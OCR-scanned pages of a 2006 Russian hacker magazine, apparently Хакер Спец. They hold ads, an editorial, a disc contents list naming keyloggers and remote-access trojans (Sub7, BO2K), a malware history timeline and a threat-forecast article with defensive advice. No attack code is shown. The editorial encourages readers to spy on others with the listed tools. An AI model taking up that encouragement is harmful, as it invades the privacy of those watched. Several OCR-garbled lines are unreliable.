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Попробуйте подписаться в редакции, позвоните нам. 


(это удобнее, чем принято думать 


ж Для подписчиков в Москве курьерская 8-495-780-88-29 (пля москьь) 

доставка БЕСПЛАТНО в день выхода журнала 8-800-200-3-999 (118 России) 
х Дешевле, чем в розницу ВСЕ ЗВОНКИ БЕСПЛАТНЫЕ 
х Гарантия доставки и замены в случае потери а ae TEA 


* Специальные предложения для подписчиков 
* Первый номер подписки высылается по звонку 
вместе с заполненной квитанцией для оплаты 
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Знание — сила! В наше время все следят 
за всеми и знания о чужих знаниях или о чужих 
знаниях о твоих незнаниях — хорошо. 
А вот знания чужих о твоих знаниях 
или незнаниях или твое незнание о чужих 
знаниях — однозначно плохо, поэтому многие 
люди стремятся постоянно поднять свой уровень 
компетентности в чужих вопросах. Обычно, 
не особо законными способами. Вот например 
разные компании очень хотят знать, на какие 
сайты ты ходишь и что там делаешь. 
Это исследования, это статистика, это деньги. 
Они активно подсаживают на наши компьютеры 
свои спайварные ВНО. А мы — расскажем тебе 
об этом! Конечно, подробно и с исходниками. 
А злые хакеры пишут невидимые программы 
с туманными функциями. А мы узнаем! Узнаем, 
как ловко у них это получается. 

Кто-то хитрый и большой хочет прочесть 
все то, что ты печатаешь на клавиатуре? 
Даже ВИРТУАЛЬНАЯ клавиатура не спасает? 
А мы расскажем ВСЕ не только о том, как пишут 
кейлоггеры, но и рассмотрим способы борьбы 
с ними! А что же насчет ботнетов? Ведь это так 
модно в наше время! Посмотрим, что же нам 
даст технология .МЕТ в этом плане. 


Александр Лозовский 
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HARD CREW 
LCD 20+ © Емыло 
тест жк-мониторов с диагональю более 20 дюймов пишите письма! 
ЗУХЕЛЬ, КОННЕКТ! 
тестируем Zyxel P-660RU Е STO RY 
39 РАССКАЗ 
SOFT о хакер: гражданская казнь 
© NoNnAve © исходники всеЛЕННОЙ 
наисвежайшие программы от nnm.ru программирование — с женой или без 
АДМИНИНГ 


настройка антивируса Касперского. Часть? 


MULTIBOOTABLE 


Софт 

Антисофт 
Утилиты 

Софт от NoNaMe 


в том числе: 


Norton Internet Security 2006 
Kaspersky Anti-Virus 6.0 
Widestep Elite Keylogger v3.0 


Обновления Windows 
(9x/XP/NT/2000/2003) 
Спец 07(68), Админ всея сети 


СТАРШИЙ БРАТ СЛЕДИТ ЗА ТОБОЙ. ТЫ ДЕЛАЕШЬ 
ШАГ И СЛЫШИШЬ ЕГО ДЫХАНИЕ ЗА СПИНОЙ. 


ВСТАНЬ НА СТУПЕНЬ ВЫШЕ: ОБЕРНИСЬ, ПОЙМАЙ 
ЕГО ЗА РУКУ И ЗАЩИТИСЬ ОТ НЕГО! А ЕЩЕ ЛУЧШЕ — 
СТАНЬ ИМ САМ. И В ЭТОМ ТЕБЕ ТОЧНО ПОМОЖЕТ 
СОФТ С НАШЕГО ДИСКА. 


СОФТ АНТИСОФТ УТИЛИТЫ 
Actual Spy 2.8 Anti-Spy.Info 1.6 IceExt 0.70 
BO2K 1.1.3 (core) Advanced Anti Keylogger v3.7 (Lite) COBA PC 


Blowfish для BO2K 


Anti-keylogger v7.3 


PE Tools v1.5.400.2003 Xmas Edition 


Ricq для BO2K 


PrivacyKeyboard v7.3 


TheBat! Pro v3.80 (+help) 


Mobile Access Control 4.0 Pro 


Trend Micro Anti-Spyware 3.0 


SDTrestore v0.2 


Remote Administrator 2.2 


DrWeb 4.33 


Ha6op ytunut ot Wasm.Ru 


TightVNC 1.3dev7 


Ad-Aware SE Pro 


icedump 6.026 & nticedump 1.14 


Sub7 2.1.5 


Kaspersky AntiVirus для Symbian (Nokia) 


Process Explorer v10.2 


Family Key Logger v2.83 


Microsoft Windows Defender Beta 


GetDataBack ona NTFS 


Personal Desktop Spy v2.10 


Norton AntiVirus 2007 Beta 


Golden Keylogger v1.32 


Norton Internet Security 2006 


Give Me Too v2.46 


Kaspersky Anti-Virus 6.0 


Personal Inspector v5.00 


Kaspersky Internet Security 6.0 


SpyArsenal Print Monitor Pro 


AVZ 4.19 


Quick Keylogger v2.1 


Agnitum Outpost Firewall Pro 3.51 


Handy Keylogger v3.25.032 


ZoneLabs ZoneAlarm 6.5.731 (Free/Pro) 


Widestep Elite Keylogger v3.0 


ZoneLabs Internet Security Suite 


СОФТ 
ОТ МОМАМЕ 


Chat Watch v4.4.5 

HDD Regenerator v1.51 

McFunSoft Video Convert Master 6.3 
Online Armor v1.1.1.826 

Sunbelt Network Security 

Inspector v1.6.57.0 

Keyboard Maniac 4.2 

NeuroSolutions v5.03 Developer Edition 
Amor SWF to Video Converter 2.3.8 
Secure iNet Factoy v5.8 for Java 
php2exe 

Fresh Diagnose v7.38 

AVG Free Edition 7.1.405 

PiMone Ver 5.1 Build:2006.7.4.145 


Думаешь, что посмотреть сегодня вечером? 
Выбираем кино с TOTAL DVD! 


Все о кино - читай о блокбастерах месяца, размышляй о лентах 
вместе со звездами, выбирай на какой сеанс пойти 

© 

Все о DVD - самые лучшие релизы месяца, более 50 обзоров, море 
интервью 

© 

„и немного о технологиях будущего! Телевидение высокой 


четкости, плазмы и многое другое! 


Total DVD — ультимативный журнал для киноманов! 


Каждый журнал комплектуется О\/О-приложением с великолепным 
полнометражным фильмом категории «А» (качество изображения и звука 
на диске соответствует лучшим мировым релизам), подборкой трейлеров и 
анонсов новых картин и роликами к DVD-penu3am. 


Ищешь себе технику для домашнего кинотеатра? 
«DVD Эксперт» - самый лучший гид по аудио- 
видео- новинкам! 

Все о Hi-Fi, High End и Home Cinema! 

e 


Пошаговые инструкции по составлению и инсталляции системы 
домашнего кино 

e 

Лучшие системы и компоненты месяца — рай ДЛЯ НОВИЧКОВ. 

Более 50 самых новых моделей в оценочных и сравнительных тестах 
e 

Готовые системы, интервью, самые свежие новости индустрии 


Всегда на лезвии прогресса! 


Выбираем домашний кинотеатр сжурналом «DVD Эксперт»! 
(ейчасэто стильно, это модно, это доступно, это просто! 

Каждый журнал комплектуется О\/О-приложением с великолепным 
полнометражным фильмом категории «А» (качество изображения и звука на диске 
соответствует лучшим мировым релизам) и тестами для настройки системы хоум 
синема. 
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1986 


Появились первые руткиты, HO сей- 
час их количество в разы больше. 
Быстрому развитию руткитов спо- 
собствует широкое распространение 
программного обеспечения с откры- 
тым кодом. На сайтах разработчиков 
ПО и в блогах содержится огромное 
количество программных строк для 
руткитов, что очень упрощает созда- 
ние вредоносных файлов даже без 
глубоких знаний об атакуемых опера- 
ционных системах. 


1995 


Началась эра макровирусов с по- 
явления Word.Concept, обитающего 
в 6-om Word’e и Windows 3.1. Выпуск 
Windows 95 перекрыл кислород мно- 
rum ОО$-вирусам, но только не злоб- 
ным макросам, живучесть которых 
оказалась для Microsoft неприятным 
сюрпризом. Макровирусы оказались 
побочным эффектом идеи тотальной 
автоматизации приложений. Да, ав- 


Андрей Кароли 
landrusha @ real.xakep.ru 
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OneHalf — резидентный файлово- 
загрузочный полиморфик. Он зара- 
жает MBR винчестера, а при загруз- 
ке с зараженного винта перехваты- 
вает INT 13h, 1Ch, 21h и записывает- 
ся в СОМ- и ЕХЕ-файлы при обра- 
щении к ним. Трудность в том, что 
код расшифровщика вируса разбро- 
сан по всему файлу со случайными 
смещениями. То есть сидит тихо и 
тайком губит твой винт. При первой 
загрузке с зараженного винта ши- 


томатизация — очень удобная шту- 
ка. Только вот проблема в том, что 
нет никаких ограничителей. А причи- 
на всех бед — ядро автоматизации, 
Visual Basic for Application (VBA). Се- 
годня он есть фактически на каждом 
Windows-komnbtoTepe в составе по- 
пулярных приложений, отсюда и бла- 
гоприятные условия для вирусных 
эпидемий. 


фрует два последних цилиндра дис- 
ка, при следующей загрузке — еще 
два и т.д. Когда количество заши- 
фрованных цилиндров достигало 
ровно половины, вирус выдает: 
«Disk is one half. Press any key to соп- 
tinue» — отсюда и название... 


1998 


Вирус Win32.ClIH в народе был изве- 
стен как «Чернобыль», так как одна 
из его версий активировалась 26 ап- 
pena, в годовщину аварии на атомной 
электростанции. Его длина немногим 
более 1 Кб, а последствия — ката- 
строфические. Он «жил» в Windows 
95/98 и ждал срабатывания логиче- 
ской бомбы: в определенный момент 
вирус активировался, стирал содер- 
жимое жесткого диска, и в некоторых 
случаях при стирании Flash BIOS 
нужно было даже менять материн- 
скую плату. Сначала о поврежде- 
ниях, нанесенных этим вирусом, за- 
говорили в Юго-Восточной Азии, в 
США и ряде других стран. У нас этот 
вирус был обнаружен позже, когда по 
стране распространились пиратские 
CD с популярными компьютерными 
играми и программами, зараженны- 
ми этим вирусом. 


1999 


Программа Back Orifice (BO) oT хаке- 
ров из группы Cult of the Dead Cow 
вызвала массовую истерию. Ни один 
ламер больше не чувствовал себя в 
безопасности. Одни называли ее от- 
мычкой, другие — инструментом 
удаленного — администрирования. 
Суть была в следующем. Проникая в 
компьютер, программа позволяла 
делать с ним все, что угодно. Для 
этого было достаточно один раз за- 
пустить на компьютере-жертве ис- 
полняемый файл размером чуть бо- 
лее 125 Кб. После этого сервер Back 
Orifice HaBcerfja поселяется в систе- 
ме, не обнаруживая себя в списке за- 
дач. А лишний файл было достаточ- 
но трудно найти в папке windows\sy- 
stem\ среди сотен других. Но главное 
было в том, что, помимо исполняемо- 
го файла, группа выложила для все- 
общего доступа и BO2k SDK. В итоге 
у каждого появилась возможность 
написать собственное дополнение к 
программе или изменить саму про- 
грамму под свои конкретные нужды. 


2004 


Фишинг только зарождался, и процве- 
тала самая простая и популярная его 
форма — «E-mail fraud». Пользова- 
тель получает письмо, где банк просит 
подтвердить персональные данные. 
Ничего не подозревая, простой как 
две копейки пользователь отвечает и 
тем самым сообщает свои данные 
злоумышленникам, которые, кстати, 
совершенно не в курсе, что пользова- 
тель является клиентом именно этого 


Ане 


банка. Они наудачу запускают спам- 
овую рассылку от имени известных 
банков, авось да и клюнет рыбка (от- 
сюда и название). Сегодня пользова- 
тель гораздо осмотрительнее и не 
спешит отвечать на каждую просьбу о 
подтверждении персональных сведе- 
ний. Хотя здесь и заслуга банков, ко- 
торые вынуждены постоянно напоми- 
нать своим клиентам, чтобы они не 
поддавались на уловки. 


Пора piu РОЗЫ Soleil к зе вот pete а ва свай 


Se ВБ eee See Ро Поли oe ees cod et eg le es ee is i ee га г-же т бт 


whe wees Pee 


ь Бали a ee ge sd ee 


er ie de ie ee es Re ee ee - 
рати ee pee es ee ee eee ee ee 


2006 


Прошло 20 лет с момента появления 
первого вируса для персоналок. Пра- 
вда, 20 лет назад основным сред- 
ством распространения злонамерен- 
ного ПО были в основном дискеты, на 
которых распространялось 99% про- 
грамм. И бдительность была весьма 
эффективным средством борьбы. Но 
с появлением OC Windows в начале 
девяностых пользователи по-настоя- 
щему узнали, что такое компьютер- 
ный вирус, и как его «подхватить». 


Массовые волнения вызвал червь 
ILOVEYOU. На компьютеры он попа- 
дал в виде письма с прикрепленным 
\/В$-файлом (тело червя). Если поль- 
зователь открывает прикрепленный 
файл, червь первым делом бросает- 
ся в адресную книгу и рассылает по 
всем адресам свою копию. Затем ви- 
рус прописывается в автозагрузку 
системного реестра, чтобы активи- 
зироваться при каждой перезагруз- 
ке системы. В свободное от работы 
время червячок искал определен- 
ные файлы на всех доступных дис- 
ках, записывая в них свою копию. 
Он был даже занесен в «Книгу ре- 
кордов Гиннеса», как самый разру- 
шительный в мире. Сам вирус был 
вполне безобиден, но его лавинооб- 
разное распространение позволяло 
вывести из строя любую почтовую 
систему. 
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8 КОГДА НАСТУПИТ ЗАВТРА 
12 АРСЕНАЛ АГЕНТА 


ШКОЛА 
БОЙЦА 


18 СМЕРТЕЛЬНАЯ МОБИЛЬНОСТЬ 
24 ШПИОНСКИЕ ИГРЫ 


когда 


28 АГЕНТУРНАЯ СЕТЬ 
30 ЛОВЛЯ HA ЖИВЦА 


наступит завтра 


АТАКИ БУДУЩЕГО 


В КАНУН НОВОГО ГОДА ПРИНЯТО ДЕЛАТЬ ПРОГНОЗЫ НА БУДУЩЕЕ, РАССКАЗЫВАЯ 
О ТОМ, КАКИЕ УГРОЗЫ И АТАКИ ЖДУТ НАС В БЛИЖАЙШЕЕ ВРЕМЯ. НО ВЕДЬ ДО НЕГО 
ЕЩЕ НЕСКОЛЬКО МЕСЯЦЕВ! АН НЕТ. НАПРИМЕР, У НАС В КОМПАНИИ НОВЫЙ ФИНАНСОВЫЙ 


Обычно, когда такие прогнозы встречаются в прес- 
се, они никак не связаны с окружающим миром. 
А ведь атаки появляются и эволюционируют не са- 
ми по себе. Например, ВЕО-вирусы никогда бы не 
появились, не будь такой шумихи вокруг самой 
ВЕ!О-технологии. Поэтому давай начнем рассказ 
не с будущего угроз, а с будущего ИТ-технологий 
и способов ведения бизнеса, которые и являются драй- 
верами для появления новых методов атакующих. 

Чего хочет руководитель любой компании, 
не взирая на ее размеры и сферу деятельности? 
Разумеется, роста своего бизнеса, который может 
быть достигнут многими способами, один из кото- 
рых — увеличение продуктивности сотрудников. 
Решить это можно как увеличением длительности 
рабочего дня, так и активизацией самой деятель- 


ГОД НАЧИНАЕТСЯ В АВГУСТЕ. 


Алексей Лукацкий 
lalukatsk @ cisco.com| 


ности подчиненных. Последнему способствует 
концепция «виртуального офиса», который подра- 
зумевает, что рабочее место там, где находится 
сотрудник, а не там, где штаб-квартира компании. 
Реализовать эту концепцию можно, сделав жизнь 
сотрудников полностью мобильной и оснастив их 
мобильными телефонами, смартфонами или КПК, 
лэптопами с беспроводным доступом (Wi-Fi, Wi- 
МАХ, RFID ит.д.), 1Р-телефонией ит.д. 

Другой способ увеличить доходы — быстрее 
выпускать новые продукты на рынок. Решить эту 
задачу можно, открыв доступ к своим ресурсам 
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партнерам, поставщикам и другим участникам 
жизненного цикла продукта. Иными словами, сеть 
компании перестает быть четко очерченной, и ее 
периметр становится размытым. Другая задача, 
которая также требует решения, — стандартиза- 
ция методов доступа к разрозненным данным, 
хранящимся в базе данных. Ее решают с помощью 
протоколов типа SOAP, XML ит.д. Правда, зача- 
стую забывая об их безопасности. А теперь посмо- 
трим, как эти ИТ-технологии, являющиеся нашим 
ближайшим будущим, приводят к развитию угроз 
безопасности... 

> вирусы сами по себе уже не сделают 
серьезный рывок вперед, так как идея классиче- 
ских вирусов, заражающих файлы на отдельном 
компьютере, уже вряд ли сможет заинтересовать 
«исследователей». Другое дело — черви, но о них 
позже. С другой стороны, вирусы пока не исчер- 
пали всех своих возможностей. Тем более что их 
авторы преподносят все больше и больше сюр- 
призов, заражая такие, казалось бы, неподвласт- 
ные им форматы, как PowerPoint, Acrobat Reader, 
мультимедиа ит.д. Все это является следствием 
недооценки вопросов безопасности при разра- 
ботке форматов и стандартов. А учитывая, что 
«гонка вооружений» только нарастает, и произво- 


киоске не первый день, и многие пользователи 
уже пострадали от «рук» червей. 

Согласно исследованиям Министерства обо- 
роны, каждые 1000 строк кода среднестатистиче- 
ской программы содержат 15 ошибок (для сравне- 
ния — среднего размера бизнес-приложение со- 
держит 150000-250000 строк кода). Диагностика 
одной ошибки требует в среднем 75 минут, а вот 
ее устранение — уже 6 часов. К тому же практика 
нам говорит о том, что разработчики обычно фо- 
кусируются на новых функциях, а не на устране- 
нии старых ошибок. 

Со скоростью распространения червей про- 
блемы наступят не завтра — они уже наступили. 
Согласно статистике, среднее время разработки 
«противоядия» у антивирусных вендоров соста- 
вляет около 6 часов. А ведь вирусную сигнатуру 
надо еще доставить всем средствам защиты, что 
зачастую требует еще нескольких часов или даже 
дней. За это время эпидемия червя уже успевает 
распространиться по всему интернету и заразить 
многие миллионы узлов. И скорость будет только 
расти. Согласно исследованиям, проведенным в 
Америке, возможно создание червя, способного 
заразить весь интернет всего за 15 минут. То есть 
такой «молниеносный» червь успеет 24 раза 


ОПАСНОСТЬ ГРОЗИТ В ДВУХ НАПРАВЛЕНИЯХ: 
РОСТ ЧИСЛА КАНАЛОВ ПРОНИКНОВЕНИЯ И УВЕЛИЧЕНИЕ 


СКОРОСТИ РАСПРОСТРАНЕНИЯ 


дители стремятся «выбрасывать» на рынки еще 
сырое ПО, можно представить, что в ближайшем 
будущем число потенциально уязвимых форма- 
тов будет только возрастать. А значит, у злоумы- 
шленников появится много новой работы, как иу 
борцов с вирусами. 

СПОСОБЫ ЗАЩИТЫ: АКТИВНОЕ ИСПОЛЬЗОВА- 
НИЕ АНТИВИРУСОВ, ИСПОЛЬЗОВАНИЕ ТОЛЬКО НУЖ- 
НЫХ ДЛЯ РАБОТЫ ПРОГРАММ, РЕГУЛЯРНАЯ УСТАНОВ- 
КА ПАТЧЕЙ, ПРЕДВАРИТЕЛЬНОЕ ТЕСТИРОВАНИЕ ПО, 
ЧТЕНИЕ БЮЛЛЕТЕНЕЙ ПО ИНФОРМАЦИОННОЙ БЕЗО- 
ПАСНОСТИ. 
> черви. Более опасны черви, которые pacnpo- 
страняются от компьютера к компьютеру и зара- 
жают целые сети, используя уязвимости в при- 
кладном и системном программном обеспечении. 
Опасность грозит в двух направлениях: рост числа 
каналов проникновения (или, иными словами, уяз- 
вимостей) и увеличение скорости распростране- 
ния. С первой проблемой мы, к сожалению, делать 
ничего не можем — число программ и версий ОС 
растет с невиданной скоростью, и специалисты по 
тестированию не успевают проверять все возмож- 
ные ответвления в этом бесчисленном множестве 
программ. А уж латать эти дыры начинают только 
после того, как продукт уже продается в каждом 


«обогнуть» всемирную сеть, прежде чем антиви- 
русные производители успеют выпустить соответ- 
ствующую «заплатку». 

СПОСОБЫ ЗАЩИТЫ: ИСПОЛЬЗОВАНИЕ АНТИВИ- 
РУСОВ И СИСТЕМ ПРЕДОТВРАЩЕНИЯ АТАК, РЕГУЛЯР- 
НАЯ УСТАНОВКА ПАТЧЕЙ, УСТАНОВКА МЕЖСЕТЕВЫХ 
ЭКРАНОВ (КОРПОРАТИВНЫХ И ПЕРСОНАЛЬНЫХ), ПРЕД- 
ВАРИТЕЛЬНОЕ ТЕСТИРОВАНИЕ ПО, ЧТЕНИЕ БЮЛЛЕТЕ- 
НЕЙ ПО ИНФОРМАЦИОННОЙ БЕЗОПАСНОСТИ. 
> spyware. Черви и вирусы опасны, но они не 
несут никакой коммерческой выгоды своим созда- 
телям (или практически не несут). Другое дело — 
программы, объединенные общим термином 
spyware (шпионское ПО). Установленные на ком- 
пьютере «жертвы», они воруют конфиденциаль- 
ную информацию и пересылают ее владельцам 
spyware. Развитие этого типа вредоносного ПО 
пойдет по пути расширения каналов его проникно- 
вения на компьютер — почта, Instant Messaging 
(например, ICQ или Mirabilis), P2P (например, Ка- 
гаа или eDonkey), web-6pay3ep и т.п. Чем боль- 
шим количеством коммуникационных возможно- 
стей станут обладать будущие компьютеры, тем 
больше возможностей появится у Spyware. 

СПОСОБЫ ЗАЩИТЫ: ИСПОЛЬЗОВАНИЕ АНТИ- 
ВИРУСОВ, СИСТЕМ ПРЕДОТВРАЩЕНИЯ АТАК И ЗАЩИ- 


ТЫ ОТ ШПИОНСКОГО ПО, РЕГУЛЯРНАЯ УСТАНОВКА 
ПАТЧЕЙ, УСТАНОВКА МЕЖСЕТЕВЫХ ЭКРАНОВ (КОР- 
ПОРАТИВНЫХ И ПЕРСОНАЛЬНЫХ), ПРЕДВАРИТЕЛЬ- 
НОЕ ТЕСТИРОВАНИЕ ПРОГРАММНОГО ОБЕСПЕЧЕ- 
НИЯ, ЧТЕНИЕ БЮЛЛЕТЕНЕЙ ПО ИНФОРМАЦИОННОЙ 
БЕЗОПАСНОСТИ. 

> = спам — это проблема, которая раздражает 
большинство из нас. И, несмотря на это, ни один 
из производителей не смог предложить рынку ре- 
шение, «убивающее» спам раз и навсегда. Связа- 
но это с тем, что спамеры не останавливаются на 
достигнутом и всегда изобретают новые методы 
обхода систем защиты от спама: преднамеренное 
использование ошибок в словах («спицеальна для 
ваз»), пробелы в словах («спецакция»), чере- 
дование строчных и заглавных букв, использова- 
ние символов-разделителей («с*п*е*ц*а*к*ц*и“я»), 
преобразование текста в графический файл ит.д. 

Сталкиваясь с различными системами за- 
щиты от спама, можно выделить два недостатка 
(которые, кстати, есть и у других средств контроля 
вредоносного контента — антивирусов, систем об- 
наружения атак и т.п.): ложные срабатывания и 
несрабатывания. В первом случае система блоки- 
рует сообщения, которые не являются спамом. 
Яркий пример — проект «Проверь здоровье своей 
сети» (www.freescan.ru). После регистрации на сайте 
пользователю, желающему протестировать защи- 
щенность своих интернет-ресурсов, приходит уве- 
домление по е-тай. Но часто случалось, что уве- 
домление воспринималось как спам и не доходи- 
ло до адресата. Во втором случае системы пропу- 
скали спам, считая его безобидным электронным 
сообщением. 

Рекламные рассылки на русском языке 
представляют собой еще большую проблему для 
антиспамовых систем, что связано с нашей мор- 
фологией. Даже разработанные в России системы 
блокирования спама, использующие лингвистиче- 
ские, графические, сигнатурные и иные методы 
идентификации нежелательных массовых рассы- 
лок, к сожалению, не справляются с этой пробле- 
мой. Согласно проведенному в 2005 году тестиро- 
ванию российских систем «Спамтест» и «Спамо- 
оборона», они не полностью решают проблему 
спама (www.ifap.ru/as/050524d1.pdf). Чего уж говорить 
о западных решениях. По словам Евгения Альтов- 
ского, координатора проекта «Антиспам», «филь- 
тры могут использоваться как временная мера 
для снижения остроты проблемы спама, однако 
настоящий заслон на его пути может поставить 
только закон и негативное отношение к спаму со 
стороны общества». 

Но так ли уж нерешаема данная проблема? 
Есть метод, который позволит существенно сни- 
зить объем спама. Перенос оборонительных рубе- 
жей с линии отдельной компании на уровень опе- 
ратора связи. Конечно, такой перенос должен со- 
провождаться и сменой методов обнаружения 
спама, ведь применение ключевых слов, белых и 
черных списков в данном случае также будет не 


столь эффективным. Вспомни, как рассылается 
спам. Это делается спамерами не со своих соб- 
ственных компьютеров, а через заранее взломан- 
ные узлы. И число сообщений с таких узлов ежед- 
невно измеряется сотнями. Будет ли обычный 
пользователь отправлять каждый день столько 
писем? Вряд ли. Поэтому можно попробовать кон- 
тролировать поток почтового трафика с каждого 
узла и, в случае превышения некоторого порого- 
вого значения, предпринимать определенные дей- 
ствия: автоматически блокировать трафик, уведо- 
млять администратора и т.п. По такому принципу 
действует, например, система Cisco Service Соп- 
trol Engine. Разумеется, в данном случае суще- 
ствует проблема ложных срабатываний, но она 
решается гораздо проще, чем в случае с тради- 
ционными методами защиты от спама. 

Возможно, со временем ситуация суще- 
ственно улучшится, но пока приходится констати- 
ровать, что спамеры более изобретательны, чем 
их оппоненты. Спам исчез бы сам, если бы мы, ря- 
довые пользователи, перестали бы покупать ре- 
кламируемые товары. Но, согласно статистике 
компаний Mirapoint и Radicati Group, 11% пользо- 
вателей приобретают товары и услуги, реклами- 
руемые в массовых рассылках. Значит, спрос на 
них есть. А пока есть спрос, будет и предложение. 
> — О№ и другие инфраструктурные атаки. Как и 
в случае со спамом, зрум/аге-коммерция управля- 
ети многими другими атаками, например, Ha DNS. 
Зачем ломать какой-либо сайт, когда можно под- 
менить запись в таблице DNS, что позволит пере- 
направить весь трафик на подставной 1Р-адрес. 
Серьезную проблему этот вид нападений предста- 
вляет потому, что от него не спасают ни межсете- 
вые экраны, ни системы предотвращения атак, ко- 
торые устанавливаются перед защищаемым сай- 
том. Более того, эти средства даже не зафиксиру- 
ют данную атаку, так как последние направлены 
не на сам защищаемый сайт, а на систему, его об- 
служивающую. 

Аналогичная ситуация может возникнуть, 
когда атака направлена на сетевое оборудование 
(маршрутизаторы и коммутаторы), через которые 
проходит трафик. Недооценка данной проблемы 
может привести к изменению маршрутов следова- 
ния сетевых пакетов (а значит, их перехвату и воз- 
можной модификации) и даже их блокированию, 
что повлечет за собой «отказ в обслуживании». 

СПОСОБЫ ЗАЩИТЫ: ВСТРОЕННЫЕ МЕХАНИЗМЫ 
ЗАЩИТЫ ИНФРАСТРУКТУРНОГО ОБОРУДОВАНИЯ, ПРА- 
ВИЛЬНЫЙ ДИЗАЙН ЯДРА СЕТИ ОПЕРАТОРА СВЯЗИ, 
ИСПОЛЬЗОВАНИЕ СИСТЕМ ПРЕДОТВРАЩЕНИЯ АТАК 
НА УРОВНЕ ОПЕРАТОРА СВЯЗИ. 
> ботнеты. Если заговорили о DoS-atakax, то 
нельзя не вспомнить о ботнетах, которые выводят 
спам и DoS-ataku на новый уровень. Если раньше 
злоумышленнику приходилось бояться, что его 
обнаружат, когда он будет реализовывать нападе- 
ние со своего компьютера, то сегодня ситуация из- 
менилась. Достаточно арендовать ботнет из тыся- 


чи-другой машин и «дать команду», все остальное — 
дело техники. Так как за многими нападениями 
стоит коммерческая выгода, то ботнеты будут 
только развиваться по пути увеличения числа ма- 
шин в сети «зомби» и разработке новых методов 
управления ботнетом, помимо предварительного 
программирования, 1ВС-каналов ит.п. 

СПОСОБЫ ЗАЩИТЫ: ВСТРОЕННЫЕ МЕХАНИЗМЫ 
ЗАЩИТЫ ИНФРАСТРУКТУРНОГО ОБОРУДОВАНИЯ, ИС- 
ПОЛЬЗОВАНИЕ СИСТЕМ ПРЕДОТВРАЩЕНИЯ АТАК НА 
УРОВНЕ ОПЕРАТОРА СВЯЗИ, СКАНИРОВАНИЕ КОМ- 
ПЬЮТЕРОВ. 
> = другие атаки. Мы перечислили лишь малую 
толику тех атак, которые нам угрожают в ближай- 
шем будущем. В среднесрочной перспективе нам 
придется задумываться о защите получающих все 
большее распространение беспроводных устрой- 
ствах — КПК, смартфонах, мобильных телефонах, 
лэптопах и т.п. Они перестанут быть модной иг- 
рушкой и прочно войдут в арсенал большинства 
деловых людей. А значит, у злоумышленников по- 
явится новая цель приложения сил. Учитывая не- 
большие размеры данных устройств и нехватку 
ресурсов, можно быть уверенным, что эффектив- 
ные средства защиты для мобильных устройств 
будут разработаны нескоро. 

Другая проблема связана с портативными 
устройствами, которые могут служить как кана- 
лом утечки информации, так и каналом проникно- 
вения угрозы в защищаемую сеть. Если КПК или 
смартфон еще можно как-то защитить, то что де- 
лать с флешками, iPod’amu, цифровыми камера- 
ми и другими портативными устройствами — не 
совсем понятно. Установить средства защиты на 
них не всегда возможно, а вот защищать их надо 
обязательно. 

Не менее актуальными через несколько лет 
станут атаки Ha !Р-телефонию (протоколы SIP и 
Н.323), технологии RFID, SOA, XML, SOAP и мно- 
гие другие. Но, к счастью, пока эти новые стандар- 
ты не так распространены в мире, и у разработчи- 
ков средств защиты есть время для разработки 
действенных методов противодействия. А пока 
нам остается бороться с уже ставшими привычны- 
ми нападениями и угрозами, не забывая при этом 
о правильном применении средств защиты. 
> = финальная рекомендация. Говоря о правиль- 
ном применении, нельзя не упомянуть один доста- 
точно важный аспект. Речь идет об обновлении 
средств отражения атак (антивирусов, IPS, антис- 
nama, контроля содержимого и т.д.). Нередко при- 
ходится видеть, что пользователи обновляют свои 
антивирусные программы (это же касается обно- 
влений систем обнаружения атак, антиспамовых 
систем и т.п.) один раз в день — как правило, 
утром, в момент загрузки компьютера. Достаточ- 
но ли этого? Можно с уверенностью сказать, что 
нет. Ежедневно появляется 30-50 новых вирусов, 
которые начинают распространяться по сетям и за- 
ражать все новые и новые жертвы. Если ты обно- 
вляешь свою антивирусную базу один раз в день, 
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то вероятность заражения компьютера между об- 
новлениями возрастает многократно. Особенно 
опасно такое бездействие во время эпидемий, 
когда вредоносная программа распространяется 
по сети с огромной скоростью. Математически до- 
казан факт создания червя, способного заразить 
все узлы интернета (при современном развитии 
информационных технологий) всего за 15 минут! 
Даже при ежечасном обновлении антивируса та- 
кой червь 4 раза «обогнет» всю сеть, прежде чем 
его «засекут» антивирусные сторожа. 

Рекомендация однократного обновления 
родилась в то время, когда об интернете никто и 
не думал, а основной парк вычислительной тех- 
ники составляли автономные компьютеры, никак 
между собой не связанные. Обмен информацией 
происходил на 5-дюймовых дискетах, програм- 
мное обеспечение не обновлялось годами и ви- 
русной эпидемией считалось распространение 
обычного загрузочного вируса в рамках одного 
отдела в течение нескольких недель. Тогда обно- 
вление антивируса «один раз в день» считалось 
колоссальным достижением, которое должно бы- 
ло свести на нет все усилия вредоносных про- 
грамм. С тех пор много воды утекло, компьютеры 
объединились не только в локальные, но и в гло- 
бальные сети, скорости обмена информации воз- 
росли многократно (когда-то считалось крупным 
достижением выйти в интернет на скорости 
14400 бод, а сегодня не хватает 7-мегабитного 
ADSL-kaHana). A вот рекомендация обновлять 
свои антивирусы один раз в день почему-то оста- 
лась. Даже обычные человеческие лекарства на- 
до принимать не один, а 2-3 раза в день (гоме- 
опатию и того чаще — каждый час при первых 
симптомах заболевания). 

Аналогичные действия надо производить и 
для защиты компьютерного организма — очищать 
свою систему защиты от вредоносных программ 
надо как можно чаще. Хотя, разумеется, переги- 
бать палку тоже не стоит. Если производитель ан- 
тивируса не выпускает обновления своего продук- 
та чаще, чем раз в день, то и настраивать куплен- 
ный антивирус на проверку новых сигнатур по нес- 
кольку раз в день тоже не стоит — это будет лиш- 
ней тратой ресурсов. 

Надо знать не только то, что грозит нам в бли- 
жайшем будущем, но и уметь защищаться от того, 
с чем приходится сталкиваться уже сегодня © 


www. ifap.ru/as/050524d1.pdf 
тестирование российских систем 
«Спамтест» и «Спамооборона» 


www.kaspersky.ru/removaltools 
утилиты для устранения наиболее опасных вирусов 
от «Лаборатории Касперского», причем бесплатно 


www.spamcop.net 

один из популярных и часто используемых спам-листов 
для автоматической блокировки мусора, который 
усредно шлют на почту спаммеры 


www.antispam.ru 

проект компании «Зенон Н.С.П.» — максимум информации 
по теме спама: полезные советы, статьи, программы и много 
не менее интересных ссылок 


арсенал 
агента 


ОБЗОР ТОПОВОГО 
ШПИОНСКОГО ВАРЕЗА 


ЧЕЛОВЕК ВСЕГДА ПЫТАЛСЯ УЗНАТЬ ТО, ЧЕГО 
ЕМУ ЗНАТЬ НЕ ПОЛОЖЕНО. ЛЮБОПЫТСТВО 

И ЖАЖДА МОГУЩЕСТВА — ТАКОВА УЖ 

ЕГО ПРИРОДА. ИНФОРМАЦИЯ ДАЕТ ЭТО — 
